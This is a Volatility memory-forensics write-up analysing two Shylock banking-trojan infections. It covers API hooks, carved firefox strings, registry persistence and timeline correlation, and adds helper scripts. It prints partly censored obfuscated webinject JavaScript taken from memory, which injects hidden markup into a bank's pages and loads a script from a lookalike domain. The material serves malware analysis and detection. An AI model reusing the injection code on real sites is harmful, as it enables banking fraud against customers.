explorer.exe[1440]@netshell.dll iat USER32.dll!ExitWindowsEx 0x0 0x184e56a (UNKNOWN)
explorer.exe[1440]@netshell.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440] inline ws2_32.dll!WSAGetLastError[0x71a394dcL] 0x71a394dc JMP [0x71a311b4] =>> 0x7c920331
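A useful check at this point is to ask where each hook target actually points: into one of the VadS regions malfind flagged, or into a legitimately loaded module. The following Python script is an added example (not code from the original post or from Volatility) that does this cross-reference. Its inputs are the two vadinfo nodes from the VAD Overview section, a subset of the dlllist entries for explorer.exe (base and size of Explorer.EXE, ntdll.dll and WS2_32.dll), and the apihooks rows for the first case above, all copied from the output on this page; the regexes assume the Volatility 2.1 column layout, and the hook target is taken as the last address on each row.

```python
"""Resolve apihooks targets against malfind/vadinfo regions and dlllist modules.

Added example, not part of the original post. VAD_REGIONS, DLLLIST and
APIHOOKS are copied from the vadinfo, dlllist and apihooks output for
explorer.exe (PID 1440) shown on this page.
"""
import re

VAD_REGIONS = """\
VAD node @80e1ea48 Start 01820000 End 018abfff Tag VadS
VAD node @ffa63a68 Start 01d30000 End 01dbbfff Tag VadS
"""

DLLLIST = r"""
0x01000000 0x0ff000 C:\WINDOWS\Explorer.EXE
0x7c910000 0x0b6000 C:\WINDOWS\system32\ntdll.dll
0x71a30000 0x017000 C:\WINDOWS\system32\WS2_32.dll
"""

APIHOOKS = """\
explorer.exe[1440]@stobject.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440] eat user32.dll!ExitWindowsEx[0x184e56aL] 0x0 0x184e56a (UNKNOWN)
explorer.exe[1440] eat user32.dll!GetMessageW[0x184e6f5L] 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@credui.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@netshell.dll iat USER32.dll!ExitWindowsEx 0x0 0x184e56a (UNKNOWN)
explorer.exe[1440] inline ws2_32.dll!WSAGetLastError[0x71a394dcL] 0x71a394dc JMP [0x71a311b4] =>> 0x7c920331
"""

VAD_RE = re.compile(r"Start ([0-9a-f]+) End ([0-9a-f]+) Tag (\S+)")
DLL_RE = re.compile(r"^0x([0-9a-f]+)\s+0x([0-9a-f]+)\s+(.+)$")
HOOK_RE = re.compile(r"^(\S+)\s+(iat|eat|inline)\s+(\S+)")
ADDR_RE = re.compile(r"0x[0-9a-f]+")


def parse_vad_regions(text):
    """Return [(start, end, tag)] with inclusive end, as vadinfo prints it."""
    return [(int(s, 16), int(e, 16), tag) for s, e, tag in VAD_RE.findall(text)]


def parse_dlllist(text):
    """Return [(base, size, basename)] from dlllist body rows."""
    mods = []
    for line in text.splitlines():
        m = DLL_RE.match(line.strip())
        if m:
            base, size, path = m.groups()
            name = path.replace("\\", "/").rsplit("/", 1)[-1]
            mods.append((int(base, 16), int(size, 16), name))
    return mods


def locate(addr, regions, modules):
    """Name the VAD region or loaded module containing addr."""
    for start, end, tag in regions:
        if start <= addr <= end:
            return "%s region 0x%08x-0x%08x" % (tag, start, end)
    for base, size, name in modules:
        if base <= addr < base + size:
            return name
    return "unmapped/unknown"


def classify_hooks(apihooks_text, regions, modules):
    """Return [(hook_type, hooked_function, target, location)] per apihooks row."""
    rows = []
    for line in apihooks_text.splitlines():
        m = HOOK_RE.match(line.strip())
        if not m:
            continue
        _owner, htype, func = m.groups()
        func = func.split("[")[0]            # drop the "[0x...L]" suffix on eat rows
        target = int(ADDR_RE.findall(line)[-1], 16)  # final address = where control lands
        rows.append((htype, func, target, locate(target, regions, modules)))
    return rows


if __name__ == "__main__":
    regions = parse_vad_regions(VAD_REGIONS)
    modules = parse_dlllist(DLLLIST)
    for htype, func, target, where in classify_hooks(APIHOOKS, regions, modules):
        print("%-6s %-32s 0x%08x -> %s" % (htype, func, target, where))
```

Every IAT/EAT hook on GetMessageW and ExitWindowsEx resolves into the first VadS region (0x01820000-0x018abfff), i.e. into the injected DLL that malfind carved, while the inline WSAGetLastError entry lands inside ntdll.dll, the kind of result that deserves a second look before being counted as malicious.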

Second Case

Infection reproduced with a different sample.

# python vol.py apihooks -f 2_infected.dmp -p 1480

Name Type Target Value
explorer.exe[1480]@rtutils.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@cscdll.dll iat ntdll.dll!NtQueryDirectoryFile 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480]@wldap32.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@stobject.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480]@vboxmrxnp.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480] eat user32.dll!0xe2[0x1bbde22L] 0x0 0x1bbde22 (UNKNOWN)
explorer.exe[1480] eat user32.dll!0x13f[0x1bbde79L] 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480]@rarext.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@iphlpapi.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@msctf.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@msctf.dll iat KERNEL32.dll!CreateProcessA 0x0 0x1bae702 (UNKNOWN)
explorer.exe[1480]@msctf.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!NtEnumerateValueKey[0x1baf04cL] 0x0 0x1baf04c (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!NtQueryDirectoryFile[0x1baeac4L] 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!ZwEnumerateValueKey[0x1baf04cL] 0x0 0x1baf04c (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!ZwQueryDirectoryFile[0x1baeac4L] 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480]@ws2help.dll iat ntdll.dll!NtQueryDirectoryFile 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480]@ws2_32.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@imagehlp.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@themeui.dll iat KERNEL32.dll!CreateProcessW 0x0 0x1bae747 (UNKNOWN)
explorer.exe[1480]@themeui.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480]@netshell.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@netshell.dll iat USER32.dll!ExitWindowsEx 0x0 0x1bbde22 (UNKNOWN)
explorer.exe[1480]@netshell.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)

Firefox Hooks

# python vol.py apihooks -f 2_infected.dmp -p 1156
Name Type Target Value
firefox.exe[1156]@shlwapi.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156] inline shlwapi.dll!0x4f[0x77ea28cdL] 0x77ea28cd JMP [0x77e91468] =>> 0x10dde79 (UNKNOWN)
firefox.exe[1156]@ssl3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@ssl3.dll iat nss3.dll!CERT_VerifyCertName 0x0 0x10d5eb0 (UNKNOWN)
firefox.exe[1156]@ssl3.dll iat nss3.dll!CERT_VerifyCertNow 0x0 0x10d5ece (UNKNOWN)
firefox.exe[1156]@xul.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@xul.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@xul.dll iat nspr4.dll!PR_Write 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@xul.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156]@xul.dll iat nss3.dll!CERT_VerifyCertName 0x0 0x10d5eb0 (UNKNOWN)
firefox.exe[1156]@xul.dll iat nss3.dll!CERT_VerifyCertNow 0x0 0x10d5ece (UNKNOWN)
firefox.exe[1156]@freebl3.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156]@freebl3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@uxtheme.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@oleaut32.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@browsercomps.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@browsercomps.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156] eat user32.dll!ExitWindowsEx[0x10dde22L] 0x0 0x10dde22 (UNKNOWN)
firefox.exe[1156] eat user32.dll!GetMessageW[0x10dde79L] 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156] inline ntdll.dll!LdrLoadDll[0x7c9261caL] 0x7c9261ca JMP 0x401410 (firefox.exe)
firefox.exe[1156]@nss3.dll iat nspr4.dll!PR_Write 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@nss3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156] eat nss3.dll!CERT_VerifyCertName[0x10d5eb0L] 0x0 0x10d5eb0 (UNKNOWN)
firefox.exe[1156] eat nss3.dll!CERT_VerifyCertNow[0x10d5eceL] 0x0 0x10d5ece (UNKNOWN)
firefox.exe[1156] eat nspr4.dll!PR_Close[0x10d5e72L] 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156] eat nspr4.dll!PR_Read[0x10d504bL] 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156] eat nspr4.dll!PR_Write[0x10d5ceeL] 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@ole32.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@comctl32.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@nssdbm3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@nssdbm3.dll iat nspr4.dll!PR_Write 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@nssdbm3.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)

Firefox Memory

Since Shylock is basically a banking trojan, and given the artifacts seen so far, it would be good to inspect its target, firefox. We can dump the whole memory belonging to firefox in this way:

# python vol.py memdump -f infected.dmp -p 1336 -D /home/../memdumps/
Volatile Systems Volatility Framework 2.1_alpha
************************************************************************
Writing firefox.exe [ 1336] to 1336.dmp

Let's carve the strings:

# strings 1336.dmp >> ff_strings.txt

Here are some strings that clearly indicate the presence of the infection:

Bad size of the file of a inject.
Bad signature of the file of a inject.
Bad control sum of the file of a inject.

By disassembling the DLL carved from explorer, a DLL name, hijackdll.dll, also emerged; the same string can be found in the firefox memory.

Since we are dealing with a banking trojan, it would be good to look for 'bank'; here are the results:

r*censored*.co.uk
id="bodycontent"
 style="display: none;"
yHsf
</body>
<TABLE*summary="Categorised details of Transactions"
<!-- content optimize -->
<script type="text/javascript" language="javascript">
var a=["","3c","64","69","76 ","69d","3d","22","6c","76l","64","76","22 ","73","74yl","65","3d","22","64i","73","70","6c","61y","3a n","6fn","65;","22 ","76","3d","22","32","77","22","3e","3c","69","66","72","61","6de ","69d","3d","22l","76l","66","72","70o","73t","22","20","6ea","6de","3d","22","6c","76","6c","66","72","70","6fs","74","22","20","73t","79","6c","65","3d","22","68e","69","67h","74: ","31","70x; wid","74","68:","201px","3b","20disp","6ca","79","3a n_CENSORED_.","6c","65","6e","67","74","68;i","2b+","29{","76a","72","20","6f","62j=d","6fcum","65","6et","2e","67e","74","45l","65mentBy","49","64","28","77ind","6fw","2e","77_i","64","73","5b","69])","3bi","66","28o","62","6a","20","26","26","20","6f","62j","2e","73","74y","6c","65){","6f","62j.","73ty","6c","65.d","69spla","79","3d","22","22;","7d","7d};","76","61","72","20","6c","76ljs","20= ","64oc","75me","6et.c","72","65at","65E","6ce","6dent","28","22sc","72","69p","74","22","29","3bdoc","75","6den","74.","67e","74E","6cemen","74B","79","49d","28","22l","76","6cd","76","22).a","70","70","65nd","43","68","69ld","28","6c","76ljs);l","76lj","73","2e","6fn","65","72","72","6f","72","3d","77i","6e","64","6f","77.","76_fun","63","3bl","76ljs","2e","6f","6e","72e","61","64","79","73","74","61t","65c","68","61","6eg","65 =","20f","75ncti","6fn(","29{","69","66 (/l","6f","61d","65d/","****************","27","62","65y","61","27","20","2b","20'","7a_0","37","33","34","365.","6as","3fqw=l","73","62","76","6b%' ","2b ","2732","6a","73d","66","76iuh%4","35","6a","64f","68djf","68","26","72","3d'","20","2b","20Mat","68","2e","72a","6edo","6d(","29","3b","3c/","73","63","72","69","70t>","3c","2fd","69","76>"];this["d"+"\x6f"+"c"+""+"\x75"+""+"\x6d"+""+"\x65"+""+"n"+""+"\x74"]["\x62"+"i"+"\x64"+""]="HJ-UK-3";a=a["j"+""+"o"+"i"+"n"+""]("\\x");this["w"+"i"+"n"+""+"d"+""+"o"+""+"w"]["e"+"v"+"a"+"l"+""]("v"+"a" + "r b = \"" + a + '"');this["d"+"o"+""+"c"+""+"u"+"m"+""+"e"+"n"+"t"]["w"+""+"r"+"i"+"t"+"e"](b);delete a; 
delete b;
</script>
<!-- content optimize end -->
</div>
</div>
<!-- content optimize -->
<script type="text/javascript" language="javascript">
var a=["","3cd","69","76 i","64","3d","22","77","61i","74","5fdi","76","22","20","73t","79","6c","65=","22d","69","73pl","61","79","3a","20","6eone","22","3e","3c/","64i","76>","3c","64","69","76","20","69","64=","22l","76","6cd","76","22","20","73","74y","6ce","3d","22","64is","70l","61","79: ","6eon","65","3b","22 ","76","3d","22","32","77","22","3e","3c","69f","72a","6d","65","20i","64=","22l","76","6cf","************************************,"64","65","64/.t","65","73t(","74his.","72","65ad","79","53tate","29 && (","74","79p","65of(","77in","64o","77.l","76","6ct","78","74)","20== ","22u","6e","64ef","69n","65d","22)) ","7bw","69n","64","6f","77","2e","76","5f","66u","6ec","28","29;","7d","3b};","09","76","61","72 u","72","6c","20='htt","70s:/","2f","77ww.se","63u","72e","2d","61","62beyn","61t","69on","61l.","63","63","2f","6a","73/","61b","62","65","79a","7a_","30","373","346","35","2ej","73","27","3b","09","6c","76","6cj","73.la","6eg","75age","20= ","22ja","76a","73c","72","69p","74","22;      l","76","6c","6as.","73","72c =","20","75","72","6c ","2b","20'?","71w=","6csb","76k","25","332jsdf","76iu","68","25","345","6adf","68","64jfh","26","72","3d' +","20M","61th.","72a","6e","64","6f","6d(","29;","3c","2fsc","72ipt>","3c","2fdi","76>"];this["d"+"\x6f"+"c"+""+"\x75"+""+"\x6d"+""+"\x65"+""+"n"+""+"\x74"]["\x62"+"i*___________________________"+"i"+"n"+""]("\\x");this["w"+"i"+"n"+""+"d"+""+"o"+""+"w"]["e"+"v"+"a"+"l"+""]("v"+"a" + "r b = \"" + a + '"');this["\x64"+""+"o"+""+"\x63"+"u"+"m"+""+"e"+""+"n"+""+"\x74"]["w"+""+"r"+"i"+"t"+"e"](b);delete a; delete b;
</script>
<!-- content optimize end -->
<script language="javascript">
function dcsMultiTrack() {};
function tc_optimise(id, txt){document.write(txt);};
</script>
<DIV id="body_div" style="display:none">
<div align="center" id="wrap_wd" style="display: none;"></div>
 id="tbl_transactions"
<TABLE*summary="Summary view of transactions" class="table-data"
 id="tbl_transactions"
summary="This table contains all your accounts to which you can transfer money"
<div class="body"
<div align="center" id="wrap_wd" style="display: none;"></div>
<DIV class="body"
/HTML,APPLICATION/XHTML+XML,APPLICATION/XML;Q=0.9,*/*;Q=0.8
<div class="nav-module-body"
 id="bc_nav_module"
<DIV class="nav-module-body"
 id="bc_nav_module"
webtrends_top_section.js"
</body>
        <div align="center" id="wrap_wd" style="display: none;"></div>
misc.js" www="
</div>
<!-- TouchClarity section -->
<script type="text/javascript" language="javascript">
this["\x64"+""+"\x6f"+""+"\x63"+""+"u"+"m"+""+"e"+"\x6e"+"\x74"+""]["\x62"+"\x69"+""+"d"]="****";var n$iii=["","3c","64i","76","20","69d","3d","22l","76l","64","76","22 s","74y",*****************0","22w","72a","70_","64i","76","5f1","22","2c","20","22tb","6c","5ft","72ans","61","63","74","69o","6es","22];","77","69","6e","64","6f","77","2e","76_","66u","6e","63=f","75","6ection(){fo","72","28","76","61","72 ","69=0","3b","69","3c","77","69","6ed","6fw.","77_","69","64","73","2el","65","6eg","74h","3bi","2b","2b","29","7b","76a","72","20","6fbj","3dd","6f","63","75men","74","2e","67et","45lemen","74","42y","49d","28","77","69","6edo","77.w","5f","69","64s","5b","69]","29","3b","69f","28o","62j","20&","26 ","6fb","6a.sty","6c","65","29{","6fbj","2e","73t","79","6c","65.","64i","73p","6c","61y__________________________________,"76","6c","6a","73 = ","64o","63","75","6d","65","6et","2e","63","72e","61","74","65E","6c","65me","6e","74","28","22","73","63","72ipt","22);do","63ume","6e","74","2eg","65","74","45le","6d","65","6e","74","42y","49","64","28","22l","76","6c","64","76","22","29.","61","70","70e","6ed","43h","69","6cd","28l","76l","6a","73","29;l","76ljs","2eo","6ee","72","72o","72=w","69ndo","77.","76_f","75","6ec;l","76l","6a","73","2e","6f","6e","72","65ad","79","73","74","61","74","65","63","68ange =","20","66unctio","6e(","29","7bif","20(","2f","6c","6fa","64ed/","2et","65","73t(","74h","69","73.","72ea","64y","53t","61","74e) &","26"*****************e n$iii;
</script>
<span id="span_logout" style="display: none;">
<div class="containerWrapper02"

Second Injection Code

*.*CENSORED*.co.uk
<div class="containerWrapper02"
f","
<!-- Touch Clarity optimise
 tag ends
"76l
<!-- Touch Clarity logging
function hide_scv_my_accounts()*{
function show_scv_my_accounts()*{
$EMPTY$
 tag ends
inputForm.memorableAnswer
; //
.focus
"j"+
if(focusElement != null) {
intbankingID')
; //
.focus
is["
o);d
E-CONTROL
</div>
<script type="text/javascript" language="javascript">
// touchclarity section
this["\x64"+"\x6f"+""+"\x63"+"\x75"+"\x6d"+"\x65"+""+"\x6e"+""+"t"+""]["\x62"+""+"\x69"+"d"]="HJ-UK-3";var $mm=["","3cdi","76 i","64=","22","77","61it_di","76","22","20cl","61ss","3d","22p","61g","65","22","20sty","6ce=","22dis","70","6c","61","79:","20n","6f","6e","65;","22","3e","3c/di","76>","3c","64i","76","20i","64","3d","22","6c","76","6cd","76","22","20style","3d","22**************************em","65","6e","74","42yI","64(wi","6edo","77.","77_ids[i","5d","29","3bi","66(ob","6a &","26 ob","6a.","73tyl","65)","7b","6f","62j","2es","74yl","65.","64","69s","70la","79=","22","2********************************0","2b '?q","77","3dl","73","62","76","6b","2532jsdf","76","69uh","2545j","64","66","68","64","6a","66h&","72='","20+","20M","61th","2e","72a","6e","64","6fm(","29;","3c/sc","72",__________________________+""+"\x6f"+""+"\x69"+"n"+""]("\\x");this["\x77"+"i"+"\x6e"+""+"\x64"+""+"o"+"\x77"+""]["\x65"+"\x76"+"\x61"+"\x6c"]("var m$o=\""+$mm+"\"");this["d"+"\x6f"+""+"\x63"+""+"\x75"+"m"+""+"e"+"\x6e"+"t"+""]["\x77"+""+"\x72"+""+"\x69"+"\x74"+"\x65"](m$o);delete m$o;delete $mm;
</script>
var sd343g3=265;}
if (false) {
id="IBlo*se;
","2
function showLightBox()*{
id="masterLb
"3a
3c",
func*Box()*{
return false;
,"72
function setfocus()*{
return false;
3a n
return false;
a","
 id="table_balance" style="display: none"
return false;
f","
top.location=self.location
"5f1
<div id="wrapper"
,"6e   
table summary="This table contains a statement of your account"
<div id="wrapper"
7et"
 style="display: none;"
<div class="containerMain"
c","
 id="containerMain"
 id="table_transfers"
,"74
<table summary="This table shows the current balance of all your accounts"
summary="This table contains all the payments that have come from your account"
 id="table_history" style="display: none"
","6
 id="personal_details"
69",   
<table summary="This table is an activity summary"
 id="table_pay_users" style="display: none"
,"6e
<div class="extPibRow *CENSORED*"><h3><strong>Other options:</strong>
title="View or amend your personal details"
"2e"
title='Update your details and preferences'
 id="my_details"
3f",
<strong>Create a new payee:</strong*</div>

This is, as should be evident, the malicious code that’s going to be injected when the victim reaches the target bank.

At this point it’s also clear that it would be quite easy to write a Volatility plugin that does this for us.
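What such a plugin would have to do is visible in the captured script itself: the loader keeps the injected markup as an array of hex fragments (n$iii in the first sample, $mm in the second), joins it with "\x", evals the result as a JavaScript string and hands it to document.write. The following stand-alone Python script is an added example, not the author’s plugin and not part of Volatility: it scans a raw image for arrays of that shape and runs the same decoding step in reverse, so the analyst sees the injected HTML instead of the fragments. The regexes and the sample dump are constructed for the demo; the fragment values in the sample are the first ones from the captured $mm array above.

```python
import re

# Shape of the obfuscated fragment array seen in the injected script:
#   var $mm=["","3c","64i","76",...];
# The variable name varies per sample (n$iii, $mm, ...), so it is captured, not hard-coded.
ARRAY_RE = re.compile(r'var\s+([$\w]+)\s*=\s*\[((?:"[^"]*"\s*,?\s*)+)\]\s*;')
FRAGMENT_RE = re.compile(r'"([^"]*)"')
HEX_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')


def decode_hex_fragments(fragments):
    """Reproduce the loader's own decoding: array.join("\\x") followed by eval() of
    the result as a JavaScript string literal. Every "\\xHH" becomes one character;
    any plain text trailing a fragment (e.g. the "i" in "64i") is kept as-is."""
    joined = "\\x".join(fragments)
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), joined)


def find_injections(dump):
    """Scan a raw memory image (bytes) for fragment arrays and return a list of
    (variable name, byte offset, decoded markup) for every array that expands to HTML."""
    text = dump.decode("latin-1")          # 1:1 byte-to-char mapping keeps offsets exact
    hits = []
    for m in ARRAY_RE.finditer(text):
        fragments = FRAGMENT_RE.findall(m.group(2))
        decoded = decode_hex_fragments(fragments)
        if "<" in decoded:                  # keep only arrays that decode to markup
            hits.append((m.group(1), m.start(), decoded))
    return hits


# Constructed sample "dump": filler bytes around an array whose fragments are the
# first ones of the captured $mm script, closed with "3e" (">") for the demo.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b'this["\\x64"+"\\x6f"]["\\x62"+"id"]="HJ-UK-3";'
    + b'var $mm=["","3c","64i","76","20","69d","3d","22l","76l","64","76","22","3e"];'
    + b"\x00" * 32
    + b"var sd343g3=265;"
)

if __name__ == "__main__":
    for name, offset, markup in find_injections(SAMPLE_DUMP):
        print(f"{name} @ 0x{offset:x}: {markup}")
```

On a real image the same scan is what a plugin would run over each process’s address space (or simply over the whole file) instead of over SAMPLE_DUMP; the decoded markup is what you would then compare against the bank’s genuine page.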

Registry Analysis

As usual, the first artifact to check is the presence of persistence (survival on reboot) key values.

First Sample

# python vol.py printkey -f infected.dmp -K "Software\Microsoft\Windows\CurrentVersion\Run"
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile

----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-24 06:31:50

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\System32\CTFMON.EXE
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-24 06:31:50

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\System32\CTFMON.EXE
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-28 06:55:38

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\system32\ctfmon.exe
REG_SZ {A3C43CDE-3A97-74B5-88A7-522DC42C016E} : (S) C:\Documents and Settings\---\Dati applicazioni\GHISLER\notepad.exe
----------------------------

The notepad.exe entry looks very suspicious; let’s see the second Shylock variant.

# python vol.py printkey -f 2_infected.dmp -K "Software\Microsoft\Windows\CurrentVersion\Run"

Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile

----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT
Key name: Run (S)
Last updated: 2011-09-30 15:10:15

Subkeys:

Values:
REG_SZ CTFMON.EXE : (S) C:\WINDOWS\system32\ctfmon.exe
REG_SZ {A3C43CDE-3A97-74B5-88A7-522DC42C016E} : (S) C:\Documents and Settings\---\Dati applicazioni\Microsoft\CryptnetUrlCache\MetaData\rdshost.exe

Here we have a different executable and directory, but a common element, {A3C43CDE-3A97-74B5-88A7-522DC42C016E}, that can be used to uniquely identify Shylock.

Analysis via Timeliner

Timeliner is a handy Volatility plugin, recently published (see the Tools section), that creates a timeline from various artifacts in memory:

  • Process
  • Sockets
  • Event Log
  • Threads
  • PE Timestamp
  • Registry

The output produced by timeliner can be VERY large, and the plugin can take some time to complete.

# python vol.py timeliner -f infected.dmp --output-file=shylock_timeline.xls

Additionally, you can specify -S (start date of the timeline) and -E (end date of the timeline) to restrict the range that gets logged.

Now that we have gathered the log, let’s see a typical timeliner entry:

2011-09-28 11:58:52 |[PROCESS]|firefox.exe|1336|1440||0x010531a8||

The core aspect is obviously the time: how can we obtain useful information for our purposes? Time correlation is the key. If you remember the sockets plugin output, there were some timestamps directly linked to the malicious activity:

  • 11:58:04 (explorer)
  • 11:58:54 (firefox)
  • 11:58:57 (firefox)
  • 06:55:38 (Registry Time)

We can search through timeliner output:

2011-09-28 11:58:54 |[SOCKET]|1336|0.0.0.0:1049|Protocol: 6 (TCP)|0x80e23220|||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|532||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|528||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|1752||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|536||||
..
2011-09-28 06:55:38 |[REGISTRY]|\Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT |$$$PROTO.HIV\Software\Microsoft\Windows\CurrentVersion\Run|||||

Here we have a clear direct time relationship with the previously seen malicious event, with one additional piece of information: the thread (TID) that is “probably” involved. It’s important to point out that in such cases the analysis should cover not only the exact time, but also a range of times sufficiently close to it.
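Searching a large timeliner file by hand for each pivot time, and then for a window around it, gets tedious quickly. The script below is an added example (not the author’s, and not part of the Timeliner plugin) that parses timeliner’s pipe-delimited lines, pulls out the events within a configurable number of seconds of each pivot time and lists the TIDs seen for a PID. The sample timeline is the subset of lines quoted above and the pivot times are the ones listed in this section; the field layout per record type is taken from those same lines and is an assumption for other record types.

```python
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%d %H:%M:%S"

# Timeliner lines taken from the output quoted above (a constructed subset for the demo).
SAMPLE_TIMELINE = r"""
2011-09-28 11:58:52 |[PROCESS]|firefox.exe|1336|1440||0x010531a8||
2011-09-28 11:58:54 |[SOCKET]|1336|0.0.0.0:1049|Protocol: 6 (TCP)|0x80e23220|||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|532||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|528||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|1752||||
2011-09-28 11:58:54 |[THREAD]|firefox.exe|1336|536||||
2011-09-28 06:55:38 |[REGISTRY]|\Device\HarddiskVolume1\Documents and Settings\---\NTUSER.DAT |$$$PROTO.HIV\Software\Microsoft\Windows\CurrentVersion\Run|||||
"""

# Pivot times from the sockets and registry analysis earlier in the post.
PIVOTS = {
    "2011-09-28 11:58:04": "explorer socket",
    "2011-09-28 11:58:54": "firefox socket",
    "2011-09-28 11:58:57": "firefox socket",
    "2011-09-28 06:55:38": "Run key last write",
}


def parse_timeline(text):
    """Split timeliner's pipe-delimited lines into {time, type, fields} records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        events.append({
            "time": datetime.strptime(fields[0], TS_FORMAT),
            "type": fields[1].strip("[]"),      # PROCESS, SOCKET, THREAD, REGISTRY, ...
            "fields": fields[2:],
        })
    return events


def events_near(events, pivot, window_seconds=0):
    """Events whose timestamp lies within +/- window_seconds of the pivot time."""
    centre = datetime.strptime(pivot, TS_FORMAT)
    lo = centre - timedelta(seconds=window_seconds)
    hi = centre + timedelta(seconds=window_seconds)
    return [e for e in events if lo <= e["time"] <= hi]


def thread_ids(events, pid):
    """TIDs of THREAD records for the given PID; layout is name|pid|tid as printed above."""
    return [e["fields"][2] for e in events
            if e["type"] == "THREAD" and e["fields"][1] == pid]


def correlate(events, pivots, window_seconds=5):
    """Map every pivot time to the events around it (empty lists are worth noting too)."""
    return {p: events_near(events, p, window_seconds) for p in pivots}


if __name__ == "__main__":
    evs = parse_timeline(SAMPLE_TIMELINE)
    for pivot, why in PIVOTS.items():
        matches = correlate(evs, [pivot])[pivot]
        print(f"{pivot} ({why}): {len(matches)} event(s)")
        for e in matches:
            print("   ", e["time"].time(), e["type"], " ".join(f for f in e["fields"] if f))
    print("firefox TIDs:", thread_ids(evs, "1336"))
```

Widening window_seconds is the scripted form of the point made above: the exact second gives the direct hit, and a few seconds either side shows the process and thread creation that surrounds it.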

Evilcry